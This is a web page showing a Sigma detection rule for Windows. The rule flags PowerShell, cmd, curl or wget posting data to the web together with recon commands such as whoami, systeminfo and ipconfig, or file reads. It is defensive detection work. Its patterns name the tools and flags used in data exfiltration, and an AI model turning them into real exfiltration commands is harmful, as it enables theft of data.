Potential Data Exfiltration Activity Via CommandLine Tools

calendar Oct 18, 2023 · attack.execution attack.t1059.001  ·
Share on: linkedin copy

Detects the use of various CLI utilities exfiltrating data via web requests

Sigma rule (View on GitHub)

 1title: Potential Data Exfiltration Activity Via CommandLine Tools
 2id: 7d1aaf3d-4304-425c-b7c3-162055e0b3ab
 3status: experimental
 4description: Detects the use of various CLI utilities exfiltrating data via web requests
 5references:
 6    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
 7author: Nasreddine Bencherchali (Nextron Systems)
 8date: 2022/08/02
 9modified: 2023/07/27
10tags:
11    - attack.execution
12    - attack.t1059.001
13logsource:
14    category: process_creation
15    product: windows
16detection:
17    selection_iwr:
18        Image|endswith:
19            - '\powershell.exe'
20            - '\pwsh.exe'
21            - '\cmd.exe'
22        CommandLine|contains:
23            - 'Invoke-WebRequest'
24            - 'iwr '
25            - 'wget '
26            - 'curl '
27        CommandLine|contains|all:
28            - ' -ur' # Shortest possible version of the -uri flag
29            - ' -me' # Shortest possible version of the -method flag
30            - ' -b'
31            - ' POST '
32    selection_curl:
33        Image|endswith: '\curl.exe'
34        CommandLine|contains: '--ur' # Shortest possible version of the --uri flag
35    selection_curl_data:
36        CommandLine|contains:
37            - ' -d ' # Shortest possible version of the --data flag
38            - ' --data '
39    selection_wget:
40        Image|endswith: '\wget.exe'
41        CommandLine|contains:
42            - '--post-data'
43            - '--post-file'
44    payloads:
45        - CommandLine|contains:
46              - 'Get-Content'
47              - 'GetBytes'
48              - 'hostname'
49              - 'ifconfig'
50              - 'ipconfig'
51              - 'net view'
52              - 'netstat'
53              - 'nltest'
54              - 'qprocess'
55              - 'sc query'
56              - 'systeminfo'
57              - 'tasklist'
58              - 'ToBase64String'
59              - 'whoami'
60        - CommandLine|contains|all:
61              - 'type '
62              - ' > '
63              - ' C:\'
64    condition: (selection_iwr or all of selection_curl* or selection_wget) and payloads
65falsepositives:
66    - Unlikely
67level: high

References

Related rules

to-top